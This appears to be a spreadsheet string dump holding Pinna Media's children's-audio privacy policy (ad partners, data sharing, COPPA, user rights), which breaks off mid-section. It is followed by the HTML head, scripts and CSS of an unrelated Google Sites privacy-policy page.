    <t>No&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;&lt;a href="https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/index.html"&gt;Privacy Policy&lt;/a&gt; / &lt;a href="https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/dashboard/index.html"&gt;Opt-out&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;p&gt;Advertising&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;DoubleClick&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt; No&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;&lt;a href="https://policies.google.com/technologies/partner-sites?hl=en-US"&gt;Google Privacy and Terms&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;p&gt;Advertising&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;Drawbridge&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;No&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;&lt;a href="https://drawbridgemarketing.com/advertising/"&gt;Website&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;p&gt;Advertising&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;Facebook&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt; No&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;&lt;a href="https://www.facebook.com/policy.php"&gt;Privacy Policy&lt;/a&gt; / &lt;a href="https://www.facebook.com/help/568137493302217"&gt;Opt-out&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;p&gt;Advertising&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;Live Intent&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;No&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;&lt;a href="https://www.liveintent.com/services-privacy-policy/"&gt;Privacy Policy&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;p&gt;Advertising&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t>LiveRamp and Arbor&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt; No&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;&lt;a href="https://liveramp.com/privacy/"&gt;Privacy Policy&lt;/a&gt; / &lt;a href="https://liveramp.com/opt_out/"&gt;Opt-out&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;p&gt;Advertising&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;Nativo&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt; No&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;&lt;a href="https://www.nativo.com/privacy-policy"&gt;Privacy Policy&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;p&gt;Advertising&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;ShareThrough&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t>No&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;&lt;a href="https://platform-cdn.sharethrough.com/privacy-policy"&gt;Privacy Policy&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;p&gt;Advertising&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;Taboola&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;No&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;&lt;a href="https://policies.taboola.com/en/privacy-policy/"&gt;Privacy Policy&lt;/a&gt; / &lt;a href="https://policies.taboola.com/en/privacy-policy/#user-choices-and-optout"&gt;Opt-out&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;p&gt;Advertising&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;Teads&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;No&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;&lt;a href="https://www.teads.com /privacy-policy/"&gt;Privacy Policy&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;p&gt;Advertising&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;TripleLift&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt; No&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;&lt;a href="https://triplelift.com/privacy/"&gt;Privacy Policy&lt;/a&gt; / &lt;a href="https://triplelift.com/consumer-opt-out/"&gt;Opt-out&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;p&gt;Advertising&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;Zenmanta&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t>No&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;&lt;a href="https://www.zemanta.com/legal#privacy-policy"&gt;Privacy Policy&lt;/a&gt; / &lt;a href="https://www.zemanta.com/opt-out/"&gt;Opt-out&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p&gt;We may collect information about you from other sources, including service providers and third parties, and combine such information with information we have collected about you. For example, we may collect information that you make available to us on or through a social media platform (such as by clicking on a social media icon linked from our Services, interacting with our social media pages, or linking your Pinna account to a social media account), including your account ID or username and other information included in your posts.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2. Lawful Basis of Processing&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Pinna processes Personal Information to: (i) deliver Services you request, (ii) consistent with your consent, (iii) for our legitimate business interests such securing and protecting the integrity of our Services, and Service development; and (iv) as permitted to meet applicable legal requirements.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;3.</t>
  </si>
  <si>
    <t>Uses of Information&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We may use information that we collect to:&lt;/p&gt;
&lt;ul&gt;&lt;li&gt;Deliver and improve our Content;&lt;/li&gt;&lt;li&gt;Provide you with the products, promotions, services, newsletters, and information you request and respond to correspondence that we receive from you;&lt;/li&gt;&lt;li&gt;Customize and personalize your use of the Services or Kids Player;&lt;/li&gt;&lt;li&gt;Contact you via email, text message (subject to an opt-in by you) or otherwise about products, services, and events that we think might be of interest to you, unless you have opted out;&lt;/li&gt;&lt;li&gt; Contact you with surveys, legal notices, and other information that may be relevant to your use of the Services;&lt;/li&gt;&lt;li&gt;Maintain or administer the Services and Content, perform business analyses, or for other internal purposes to improve the quality of our business, the Services, and other products and services we offer;&lt;/li&gt;&lt;li&gt;Publish stories, comments, and other information posted in our interactive online features;&lt;/li&gt;&lt;li&gt;Process employment applications and inquiries;&lt;/li&gt;&lt;li&gt;To show you relevant ads, and measure the effectiveness and reach of ads; and&lt;/li&gt;&lt;li&gt;As otherwise described to you at the point of collection or pursuant to your consent.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;strong&gt;&lt;a id="serviceproviders"&gt;&lt;/a&gt;4. Sharing of Information&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We may share information that we collect via the Services or Kids Player with the parties listed below.&lt;/p&gt;
&lt;ul&gt;&lt;li&gt;Corporate Parents, Affiliates, and Subsidiaries.</t>
  </si>
  <si>
    <t>We may share your information with our corporate parents, subsidiaries, and other affiliated entities for a variety of purposes, including business, operational, and marketing purposes;&lt;/li&gt;&lt;li&gt;Service Providers. We may share your information with our agents and service providers that perform certain functions or services on our behalf. These are:&lt;ul&gt;&lt;li&gt;Billing, collection, and payment;&lt;/li&gt;&lt;li&gt;Auditing and accounting;&lt;/li&gt;&lt;li&gt;Professional services;&lt;/li&gt;&lt;li&gt;Analytics;&lt;/li&gt;&lt;li&gt;Security;&lt;/li&gt;&lt;li&gt;Information technology support, including cloud storage, software-as-a-service, and business software; and&lt;/li&gt;&lt;li&gt;Sending marketing emails.&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;li&gt;Third Parties.</t>
  </si>
  <si>
    <t>We may share your information with select advertising, marketing, and analytics partners so that they can provide you with advertisements that may be of interest to you. &lt;strong&gt;When you use the Kids Player, we limit the third parties that collect information from you to those that support analytics functions; none of those third parties collect information to serve advertising&lt;/strong&gt;.&lt;/li&gt;&lt;li&gt;Other Parties When Required by Law or as Necessary to Protect the Services</t>
  </si>
  <si>
    <t>. We may disclose your information to third parties in order to protect the legal rights, safety, and security of Pinna, our corporate parents, affiliates, and subsidiaries, and the users of our Services or Kids Player; enforce our Terms of Service; prevent fraud (or for risk management purposes); and comply with or respond to law enforcement or legal process or a request for cooperation by a government or other entity, whether or not legally required;&lt;/li&gt;&lt;li&gt;In Connection with a Transfer of Assets. If we sell all or part of our business, or make a sale or transfer of assets, or are otherwise involved in a merger or business transfer, or in the event of bankruptcy, we may transfer your information to one or more third parties as part of that transaction;&lt;/li&gt;&lt;li&gt;Other Parties with Your Consent.</t>
  </si>
  <si>
    <t>We may share information about you with third parties when you consent to such sharing, including when you post information to a user profile or a public area of the Services, such as a chat room, forum, blog, or other community tool; and&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;strong&gt;&lt;a id="privacy"&gt;&lt;/a&gt;5. Children’s Privacy&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;a.&lt;strong&gt;&lt;em&gt; Services&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Our Services (for example, the &lt;a href="http://www.pinna.fm/"&gt;www.pinna.fm&lt;/a&gt; website and social media pages) are not directed to children under the age of 13 in the US or children under the age of 16 in the European Union (“EU”). Pinna does not knowingly collect any Personal Information on its Services from children under the age of 13 in the US or under the age of 16 in the EU.&lt;/p&gt;
&lt;p&gt;b. &lt;em&gt;&lt;strong&gt;</t>
  </si>
  <si>
    <t>Kids Player&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;When users interact with our Kids Player, we or partners operating on our behalf collect device identifiers (such as an IP address or unique device identifier) solely to support our internal operations, which are analyzing the Kids Player’s performance, personalizing Content recommendations based on user activity, and protecting the security or integrity of the Kids Player.&lt;/p&gt;
&lt;p&gt; If we change our practices – for example, if we collected persistent identifiers for advertising purposes – we will first notify parents and (if necessary) obtain their verifiable consent for that new practice.&lt;/p&gt;
 &lt;p&gt;Apart from collecting limited audio information necessary for the functioning of our [voice activated show experience], our Kids Player does not enable children to upload information about themselves or otherwise communicate their information to anyone.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We may share information collected via the Kids Player when we believe in good faith that we are authorized or required to do so to respond to lawful subpoenas, warrants, court orders, or other regulatory or law enforcement requests, to protect the integrity of our Services or Kids Player, or to protect the safety of our users.&lt;/p&gt;
&lt;p&gt;c. &lt;strong&gt;&lt;em&gt;More Information and Contact&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Parents or teachers may contact us at any time using the contact information below. In any such request, please include the parent’s or teacher’s email address associated with the account. To protect children’s privacy and security, we will take reasonable steps to verify a parent’s identity before responding.&lt;/p&gt;
&lt;p&gt;&lt;a href="mailto:contact@pinna.fm"&gt;contact@pinna.fm&lt;/a&gt;&lt;br /&gt;Pinna</t>
  </si>
  <si>
    <t>Media LLC&lt;br /&gt;Contact Person: Pinna&lt;br /&gt;249 Smith Street #134&lt;br /&gt;Brooklyn, NY 11231&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We designed our Kids Player to address the requirements of the Children’s Online Privacy Protection Act (“COPPA”) and other laws applicable to children’s data protection. To learn more about COPPA, you may consult this simple one-page informational guide from the kidSAFE Seal Program: &lt;a href="http://www.kidsafeseal.com/knowaboutcoppa.html"&gt;http://www.kidsafeseal.com/knowaboutcoppa.html&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;6. Data Security&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We implement technical and organizational measures designed to protect your information against accidental or intentional destruction or loss, and unauthorized disclosure or access.&lt;/p&gt;
&lt;p&gt;You are responsible for maintaining the confidentiality of your account password and for any access to or use of the Services or Kids Player using your password, whether or not authorized by you.</t>
  </si>
  <si>
    <t>Please notify us immediately of any unauthorized use of your password or account or any other breach of security.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;7. Data Storage and Retention&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt; Your information is stored on our servers and on the servers of database management service providers that we have engaged which are located in the United States.</t>
  </si>
  <si>
    <t>We retain data for the duration of the relationship you have with us.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;8. Accuracy of Personal Information&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;While we take various steps to ensure the accuracy and completeness of your information, we rely upon you to provide accurate and complete information when interacting with us.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;9. Your Rights&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;California residents should reference our California Consumer Privacy Act disclosure below.&lt;/p&gt;
&lt;p&gt;Under certain circumstances, and as required by applicable law, you have the right to:&lt;/p&gt;
&lt;ul&gt;&lt;li&gt;Request access to your information.</t>
  </si>
  <si>
    <t>This enables you to receive a copy of the information we hold about you. Please note that your &lt;a href="https://account.pinna.fm/my-account"&gt;Account&lt;/a&gt; page allows you to access and update your information.&lt;/li&gt;&lt;li&gt;Request correction of any incomplete or inaccurate information that we hold about you.&lt;/li&gt;&lt;li&gt;Request erasure of your information. Please note that we may have a reason to deny your deletion request or delete data in a more limited way than you anticipated, e.g., because of a legal obligation to retain it.&lt;/li&gt;&lt;li&gt;Object to processing of your information where we are relying on a legitimate interest (or those of a third party) and there is something about your particular situation which makes you want to object to processing on this ground.&lt;/li&gt;&lt;li&gt;Request the restriction of processing of your information to suspend the processing, for example if you want us to verify its accuracy or our reason for processing it.&lt;/li&gt;&lt;li&gt;Request the transfer of your information to another party.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;If you want to exercise any of these rights, please contact us using the information in the “Contact Us” section of this Privacy Policy.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We will not charge a fee to access your Personal Information (or to exercise any of the other rights). However, we may charge a reasonable fee if your request for access is unfounded or excessive if permitted by applicable law. Alternatively, we may refuse to comply with the request in such circumstances.</t>
  </si>
  <si>
    <t>There may be requests that we are unable to process because of other legal requirements. If a request is denied, we will notify you of the reason.&lt;/p&gt;
&lt;p&gt;If you are located in the EU, you have the right to lodge a complaint with an EU Supervisory Authority. However, if you have a complaint regarding the processing of your personal data we request that you first contact us and we will reply on timely basis.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Special Information for Nevada Residents&lt;/em&gt;&lt;strong&gt;:&lt;/strong&gt;</t>
  </si>
  <si>
    <t>Residents of the State of Nevada have the right to opt out of the sale of certain pieces of their information to other companies who will sell or license their information to others. At this time, we do not engage in such sales. If you are a Nevada resident and would like more information about our data sharing practices, please contact us using the information below.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;10.</t>
  </si>
  <si>
    <t>Options to Control Your Information&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;a. &lt;em&gt;&lt;strong&gt; Your Account&lt;/strong&gt;&lt;/em&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;You may update your contact information and payment details through your &lt;a href="https://account.pinna.fm/my-account"&gt;Account&lt;/a&gt; page.&lt;/p&gt;
&lt;p&gt;b. &lt;em&gt;&lt;strong&gt;Communications Preferences&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;You may choose to receive promotional communications (including emails and text messages), newsletters, and similar communications from us. We will not sell, rent, swap or authorize any third party to use your email address or phone number for their own commercial purposes without your permission.</t>
  </si>
  <si>
    <t>You may opt out of receiving certain promotional communications from us at any time by (i) for promotional emails, by clicking on the opt-out or “unsubscribe” link included in the commercial emails you receive or emailing us at &lt;a href="mailto:contact@pinna.fm"&gt;contact@pinna.fm&lt;/a&gt; and (ii) for text messages, following the instructions provided in text messages from us to text the word “STOP”. Please note that your opt-out is limited to the email address or phone number used and will not affect subsequent subscriptions. Opt-out requests for email may take up to 10 business days to be effective.</t>
  </si>
  <si>
    <t>Your opt-out request will not apply to messages that you request or emails that are not commercial in nature.&lt;/p&gt;
&lt;p&gt;c. &lt;em&gt;&lt;strong&gt;Analytics and Advertising Tracking Technologies&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;On Our Services&lt;/em&gt;: You may control our use of tracking technologies by using our cookie management options menu, &lt;a href="#pup-cookie-settings"&gt;here&lt;/a&gt;, or by using the links we make available in the table listing our tracking partners above.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Global Opt-out&lt;/em&gt;: We adhere to the Digital Advertising Alliance’s (“DAA”) Self-Regulatory Principles for Online Behavioral Advertising (“DAA Principles”). You may use several opt-out mechanisms that advertisers make available to opt out of tracking on Pinna and third party websites.</t>
  </si>
  <si>
    <t>To exercise your opt-out choice, please visit:&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; The Digital Advertising Alliance’s websites: &lt;a href="http://www.aboutads.info/choices"&gt;http://www.aboutads.info/choices&lt;/a&gt;, &lt;a href="http://www.aboutads.info/appchoices"&gt;http://www.aboutads.info/appchoices&lt;/a&gt;, or &lt;a href="https://youradchoices.com/"&gt;https://youradchoices.com/&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;The Network Advertising Initiative (“NAI”) website: &lt;a href="http://www.networkadvertising.org/choices/"&gt;http://www.networkadvertising.org/choices/&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;The European Interactive Digital Advertising Alliance (“EDAA”) opt-out page: &lt;a href="https://www.youronlinechoices.com/uk/protecting-your-privacy"&gt;https://www.youronlinechoices.com/uk/protecting-your-privacy&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Please be aware that, even if you exercise an opt-out choice through these mechanisms, you may continue to receive ads. Pinna is not responsible for effectiveness of, or third parties’ compliance with, these programs.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Do Not Track&lt;/em&gt;:</t>
  </si>
  <si>
    <t>You may choose to activate a “do-not-track” signal via your browser. Because of differences in how web browsers incorporate and activate this feature, it is not always clear whether users intend for these signals to be transmitted, or whether they even are aware of them. Because there currently is no industry standard concerning what, if anything, websites should do when they receive such signals, Pinna currently does not take action in response to these signals.</t>
  </si>
  <si>
    <t>For more information on “do-not-track,” visit &lt;a href="http://www.allaboutdnt.com/"&gt;http://www.allaboutdnt.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;11. International Transfers of Personal Information&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Please be aware that the inf</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en-US" itemscope itemtype="http://schema.org/WebPage"&gt;&lt;head&gt;&lt;meta charset="utf-8"&gt;&lt;script nonce="HXjrfQMs2P2iiiCRorAQEw"&gt;var DOCS_timing={}; DOCS_timing['sl']=new Date().getTime();&lt;/script&gt;&lt;script nonce="HXjrfQMs2P2iiiCRorAQEw"&gt;function _DumpException(e) {throw e;}&lt;/script&gt;&lt;script nonce="HXjrfQMs2P2iiiCRorAQEw"&gt;_docs_flag_initialData={"atari-emtpr":false,"atari-ebidm":true,"atari-ebids":true,"atari-edtm":true,"atari-eibrm":false,"atari-ectm":false,"atari-ects":false,"atari-ebam":false,"docs-text-elei":false,"docs-text-usc":true,"atari-bae":false,"docs-text-emmkc":false,"docs-text-etsrdpn":false,"docs-text-etsrds":false,"docs-text-erdfs":false,"docs-text-encps":false,"docs-text-eeves":false,"docs-text-endes":false,"docs-text-etocls":false,"docs-text-escpv":true,"docs-text-efts":false,"docs-text-ecfs":false,"docs-text-ecss":false,"docs-text-evs":false,"docs-text-etvs":false,"docs-text-etvls":false,"docs-text-ethples":false,"docs-text-echs":false,"docs-text-eessips":false,"docs-text-eesntps":false,"docs-text-eesss":false,"docs-text-etls":false,"docs-text-ems":false,"docs-text-edctps":false,"docs-text-edctzs":false,"docs-text-eetsfem":false,"docs-text-eetpm":false,"docs-text-lns":false,"docs-text-edhcfs":false,"docs-text-ertkmcp":false,"docs-etshc":false,"docs-text-tbcb":2.0E7,"docs-text-ftls":true,"docs-efsmsdl":false,"docs-euoftm":false,"docs-text-etb":false,"docs-text-esbefr":false,"docs-text-etof":false,"docs-text-ipi":false,"docs-etbe":false,"docs-text-ehlb":false,"docs-text-epa":true,"docs-text-ecls":true,"docs-text-enbcr":false,"docs-text-svofc":false,"docs-sup":"","docs-eldi":false,"docs-eeii":false,"docs-dli":false,"docs-liap":"/logImpressions","ilcm":{"eui":"AHKXmL3loGRvJXgsDorozzJpltdkKSZfFi2kHxl2ii8938UuQVTd689HYaNw_0p01RZA1LFIbhXh","je":1,"sstu":1681340338594165,"si":"CPvCg-24pf4CFenUSgAdk4MCxw","gsc":null,"ei":[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746992,5747267,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50263472,50291080,50313182,50322323,50347762,50455861,50468091],"crc":0,"cvi":[]},"docs-ccdil":false,"docs-eil":true,"docs-eoi":false,"info_params":{},"atari-jefp":"/_/view/jserror","docs-jern":"view","atari-rhpp":"/_/view","docs-eeytpgc":true,"docs-feytpgc":false,"docs-ecuach":false,"docs-cclt":2033,"docs-ecci":false,"docs-esi":false,"docs-eytpgcv":0}; _docs_flag_cek= null ; if (window['DOCS_timing']) {DOCS_timing['ifdld']=new Date().getTime();}&lt;/script&gt;&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;&lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;&lt;meta name="referrer" content="origin"&gt;&lt;link rel="icon" href="https://lh4.googleusercontent.com/R4Z9Qsff-ScL3reHzg33tnpo7v-34Vr37gKftNiNUqevbhvOZSZeI9hIgm1nNtnFWsWMWuZmH2NPSsgpepiPW3tY8FOVhyqc1Gs0efebc7HNF554"&gt;&lt;meta property="og:title" content="PRIVACY POLICY"&gt;&lt;meta property="og:type" content="website"&gt;&lt;meta property="og:url" content="https://www.fungamesplaykids.com/privacy-policy"&gt;&lt;meta property="og:description" content="
Website and Services "&gt;&lt;meta itemprop="name" content="PRIVACY POLICY"&gt;&lt;meta itemprop="description" content="
Website and Services "&gt;&lt;meta itemprop="url" content="https://www.fungamesplaykids.com/privacy-policy"&gt;&lt;meta itemprop="thumbnailUrl" content="https://lh4.googleusercontent.com/LA9j1IyFmVeObIEqEZIFENFDNwGarVxMfZ0x1eLtrreJBiaN9Qdw56_f2NGy8Q-EEpXIs4JmhOiRqUGcT0uJh00=w16383"&gt;&lt;meta itemprop="image" content="https://lh4.googleusercontent.com/LA9j1IyFmVeObIEqEZIFENFDNwGarVxMfZ0x1eLtrreJBiaN9Qdw56_f2NGy8Q-EEpXIs4JmhOiRqUGcT0uJh00=w16383"&gt;&lt;meta itemprop="imageUrl" content="https://lh4.googleusercontent.com/LA9j1IyFmVeObIEqEZIFENFDNwGarVxMfZ0x1eLtrreJBiaN9Qdw56_f2NGy8Q-EEpXIs4JmhOiRqUGcT0uJh00=w16383"&gt;&lt;meta property="og:image" content="https://lh4.googleusercontent.com/LA9j1IyFmVeObIEqEZIFENFDNwGarVxMfZ0x1eLtrreJBiaN9Qdw56_f2NGy8Q-EEpXIs4JmhOiRqUGcT0uJh00=w16383"&gt;&lt;link href="https://fonts.googleapis.com/ css?family=Playfair%20Display%3A400%2C700%7COpen%20Sans%3A400%2C700&amp;display=swap" rel="stylesheet" nonce="tLwgn5ZFzKb-pK9lDCEnow"&gt;&lt;link href="https://fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css?family=Google+Sans:400,500|Roboto:300,400,500,700|Source+Code+Pro:400,700&amp;display=swap" rel="stylesheet" nonce="tLwgn5ZFzKb-pK9lDCEnow"&gt;&lt;link href="https://fonts.googleapis.com/ css?family=Playfair%20Display%3Ai%2Cbi%2C700%2C400%7CRoboto%3Ai%2Cbi%2C700%2C400&amp;display=swap" rel="stylesheet" nonce="tLwgn5ZFzKb-pK9lDCEnow"&gt;&lt;style nonce="tLwgn5ZFzKb-pK9lDCEnow"&gt;@media only screen and (max-width: 479px){.jgG6ef{font-size: 17.0pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.jgG6ef{font-size: 17.0pt;}}@media only screen and (min-width: 768px) and (max-width: 1279px){.jgG6ef{font-size: 18.0pt;}}@media only screen and (min-width: 1280px){.jgG6ef{font-size: 18.0pt;}}@media only screen and (max-width: 479px){.puwcIf{font-size: 20.0pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.puwcIf{font-size: 22.0pt;}}@media only screen and (min-width: 768px) and (max-width: 1279px){.puwcIf{font-size: 24.0pt;}}@media only screen and (min-width: 1280px){.puwcIf{font-size: 24.0pt;}}&lt;/style&gt;&lt;link rel="stylesheet" href="https://www.gstatic.com/_/atari/_/ss/k=atari.vw.jffPnSbrV38.L.X.O/d=1/rs=AGEqA5liTY9eJ3KZzwxTWsMzfIyQn11GcQ" data-id="_cl" nonce="tLwgn5ZFzKb-pK9lDCEnow"&gt;&lt;script nonce="HXjrfQMs2P2iiiCRorAQEw"&gt;&lt;/script&gt;&lt;title&gt;PRIVACY POLICY&lt;/title&gt;&lt;style jsname="ptDGoc" nonce="tLwgn5ZFzKb-pK9lDCEnow"&gt;.ImnMyf{background-color: rgba(255,255,255,1); color: rgba(33,33,33,1);}.Vs12Bd{background-color: rgba(240,240,240,1); color: rgba(33,33,33,1);}.S5d9Rd{background-color: rgba(58,58,58,1); color: rgba(255,255,255,1);}.O13XJf{height: 340px;}.O13XJf .IFuOkc{background-image: url(https://ssl.gstatic.com/atari/images/vision-header.jpg);}.O13XJf .IFuOkc:before{background-color: rgba(31,31,31,1); opacity: 0.5; display: block;}.O13XJf .zfr3Q{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.O13XJf .qnVSj{color: rgba(255,255,255,1);}.O13XJf .Glwbz{color: rgba(255,255,255,1);}.O13XJf .qLrapd{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.O13XJf .aHM7ed{color: rgba(255,255,255,1);}.O13XJf .NHD4Gf{color: rgba(255,255,255,1);}.O13XJf .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}@media only screen and (max-width:</t>
  </si>
  <si>
    <t>479px){.O13XJf .QmpIrf{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.O13XJf .QmpIrf{font-size: 11pt;}}@media only screen and (max-width: 479px){.O13XJf{height: 250px;}}.SBrW1{height: 430px; padding-bottom: 120px; padding-top: 120px;}@media only screen and (min-width: 1280px){.yMcSQd .SBrW1{padding-bottom: 120px; padding-top: 176px;}}@media only screen and (max-width: 1279px){.Ly6Unf .SBrW1{padding-bottom: 120px; padding-top: 176px;}}.Wew9ke{fill: rgba(255,255,255,1);}.fOU46b .KJll8d{background-color: rgba(255,255,255,1);}.fOU46b .tCHXDc{color: rgba(255,255,255,1);}.fOU46b .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}.fOU46b .G8QRnc .tCHXDc{color: rgba(255,255,255,1);}.fOU46b .G8QRnc</t>
  </si>
  <si>
    <t>.iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}.fOU46b .aCIEDd .tCHXDc{color: rgba(255,255,255,1);}.fOU46b .aCIEDd .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (min-width: 1280px){.b2Iqye.fOU46b .G8QRnc .tCHXDc{color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}}.b2Iqye.fOU46b .iWs3gf.chg4Jd:focus{background-color: rgba(33,33,33,0.1199999973);}@media only screen and (min-width: 1280px){.b2Iqye.fOU46b .aCIEDd .tCHXDc{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,1);}}.b2Iqye.fOU46b .iWs3gf.chg4Jd:focus{background-color: rgba(0,0,0,0.1199999973);}@media only screen and (min-width: 1280px){.XeSM4.b2Iqye.fOU46b .LBrwzc .tCHXDc{color: rgba(255,255,255,1);}}.XeSM4.b2Iqye.fOU46b .LBrwzc .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (min-width: 1280px){.KuNac.b2Iqye.fOU46b .GBy4H</t>
  </si>
  <si>
    <t>.tCHXDc{color: rgba(33,33,33,1);}}.KuNac.b2Iqye.fOU46b .iWs3gf.chg4Jd:focus{background-color: rgba(33,33,33,0.1199999973);}@media only screen and (min-width: 1280px){.fOU46b .XeSM4 .tCHXDc{color: rgba(255,255,255,1);}}.fOU46b .XeSM4</t>
  </si>
  <si>
